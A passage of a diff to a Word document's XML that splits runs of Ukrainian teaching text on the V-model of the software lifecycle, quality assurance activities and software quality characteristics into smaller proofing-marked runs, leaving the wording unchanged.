+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізняється стабільністю требоваінй;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1288,7 +1715,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Вона добре спрацьовує тоді, коли вимоги до якості домінують над вимогами до витрат і графіку виконання проекту;</w:t>
+        <w:t xml:space="preserve">Вона </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>добре</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> спрацьовує тоді, коли вимоги до якості домінують над вимогами до витрат і графіку виконання проекту;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1335,7 +1780,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>при правильному використанні моделі дефекти можна виявити на більш ранніх етапах, коли їх усунення ще не вимагає щодо великих витрат;</w:t>
+        <w:t xml:space="preserve">при правильному використанні моделі дефекти можна виявити </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>на б</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ільш ранніх етапах, коли їх усунення ще не вимагає щодо великих витрат;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1358,7 +1821,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона полегшує роботу менеджеру проекту зі складання плану і комплектації команди розробників;</w:t>
+        <w:t>вона полегшує роботу менеджеру проекту зі складання плану і комплектації команди розробникі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1381,7 +1862,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>вона дозволяє учасникам проекту, що завершив дії на виконуваної ними фазі, взяти участь в реалізації інших проектів;</w:t>
+        <w:t>вона дозволяє учасникам проекту, що завершив дії на виконуваної ними фазі, взяти участь в реалізації інших проекті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1404,7 +1903,61 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Вона визначає процедури з контролю за якістю. Кожні отримані дані піддаються огляду. Така процедура використовується командою розробників для визначення якості системи;</w:t>
+        <w:t xml:space="preserve">Вона визначає процедури з контролю </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>за</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> якістю. Кожні отримані дані </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>іддаються огляду. Така процедура використовується командою розробникі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для визначення якості системи;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1427,7 +1980,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>стадії моделі досить добре визначені і зрозумілі;</w:t>
+        <w:t xml:space="preserve">стадії моделі досить </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>добре</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> визначені і зрозумілі;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1538,7 +2109,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>відповідним для нас, виявляються такими недоліки:</w:t>
+        <w:t xml:space="preserve">відповідним для нас, виявляються </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>такими</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> недоліки:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2181,7 +2770,25 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>спрямованим на верифікацію і атестацію продукту. Вона демонструє, що тестування продукту обговорюється</w:t>
+        <w:t>спрямованим на верифікацію і атестацію продукту. Вона демонстру</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>є,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> що тестування продукту обговорюється</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2215,7 +2822,43 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи -на фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений пунктирною лінією між прямокутниками V-подібної моделі.</w:t>
+        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-н</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">а фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>пунктирною</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> лінією між прямокутниками V-подібної моделі.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2281,8 +2924,18 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>, була розроблена як р</w:t>
-      </w:r>
+        <w:t xml:space="preserve">, була розроблена як </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2298,7 +2951,61 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається після завершення отримання результативних даних попередньої фази. Модель демонструє комплексний підхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і фазами </w:t>
+        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ісля завершення отримання результативних даних попередньої фази. Модель демонструє комплексний </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фазами</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3142,7 +3849,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>в ній не враховані ітерації між фазами;</w:t>
+        <w:t xml:space="preserve">в ній не враховані ітерації </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>між</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> фазами;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3165,7 +3890,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>в моделі не передбачено внесення вимоги динамічних змін на різних етапах життєвого циклу;</w:t>
+        <w:t xml:space="preserve">в моделі не передбачено внесення вимоги динамічних змін на </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізних етапах життєвого циклу;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3188,7 +3931,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>тестування вимог в життєвому циклі відбувається занадто пізно, внаслідок чого неможливо внести зміни, які не вплинувши при цьому на графік виконання проекту;</w:t>
+        <w:t xml:space="preserve">тестування вимог в життєвому циклі відбувається занадто </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізно, внаслідок чого неможливо внести зміни, які не вплинувши при цьому на графік виконання проекту;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3211,7 +3972,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>в модель не входять дії, спрямовані на аналіз ризиків.</w:t>
+        <w:t>в модель не входять дії, спрямовані на аналіз ризикі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3237,13 +4016,23 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>З метою подолання цих недоліків V-образну модель можна модифікувати, включивши в неї ітераційні цикли, призначені для вирішення змін у вимогах за рамками фази аналізу.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>З</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> метою подолання цих недоліків V-образну модель можна модифікувати, включивши в неї ітераційні цикли, призначені для вирішення змін у вимогах за рамками фази аналізу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3286,7 +4075,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Планування, що полягає в підготовці плану робіт, в якому знаходять відображення вимоги до якості, розподіляються завдання між виконавцями, складаються графіки і розділяється відповідальність.</w:t>
+        <w:t xml:space="preserve">Планування, що полягає в </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідготовці плану робіт, в якому знаходять відображення вимоги до якості, розподіляються завдання між виконавцями, складаються графіки і розділяється відповідальність.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3304,13 +4111,23 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Розробку стратегії, методів і процедур, що складається в створенні нормативних інструкцій, що охоплюють всі етапи проектування, в тому числі, встановлення вимог до системи, програмування, тестування відповідно до потреб конкретного проекту. </w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Розробку стратегії, методів і процедур, що складається в створенні нормативних інструкцій, що охоплюють всі етапи проектування, в тому числі, встановлення вимог до системи, програмування, тестування відповідно до потреб конкретного проекту.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3360,7 +4177,25 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>створення нових ручних і автоматичних процедур, що дозволяють контролювати його відповідність встановленим вимогам, що стосуються ефективності функціонування і стандартів якості.</w:t>
+        <w:t xml:space="preserve">створення нових ручних і автоматичних процедур, що дозволяють контролювати </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>його в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідповідність встановленим вимогам, що стосуються ефективності функціонування і стандартів якості.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3406,7 +4241,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Спостереження за випробуваннями програмних засобів, що припускає складання звітів про випробування з аналізом проблем, причин помилок і обгрунтованому коригувальних дій.</w:t>
+        <w:t>Спостереження за випробуваннями програмних засобів, що припускає складання звіті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> про випробування з аналізом проблем, причин помилок і обгрунтованому коригувальних дій.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3429,7 +4282,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Збереження робочої документації, що стосується звітів про проблеми проектування і програмування системи, контрольних прикладів, протоколів випробувань, тестових даних, оглядів якості та інших аспектів.</w:t>
+        <w:t>Збереження робочої документації, що стосується звітів про проблеми проектування і програмування системи, контрольних прикладів, протоколів випробувань, тестових даних, оглядів якості та інших аспекті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3505,8 +4376,20 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>ІВ</w:t>
-      </w:r>
+        <w:t>І</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>В</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4034,16 +4917,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -4062,7 +4935,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Функціональність (functionality). Здатність ПЗ в певних умовах вирішувати завдання, потрібні користувачам. Визначає, що саме робить ПЗ, які завдання воно вирішує</w:t>
+        <w:t>Функціональність (functionality). Здатність ПЗ в певних умовах вирішувати завдання, потрібні користувачам. Визнача</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>є,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> що саме робить ПЗ, які завдання воно вирішує</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4085,7 +4976,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Функціональна придатність (suitability). Здатність вирішувати потрібний набір завдань.</w:t>
+        <w:t>Функціональна придатність (suitability). Здатність вирішувати потрібний набі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> завдань.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4225,7 +5134,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Надійність (reliability). Здатність ПЗ підтримувати певну працездатність в заданих умовах.</w:t>
+        <w:t xml:space="preserve">Надійність (reliability). Здатність ПЗ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
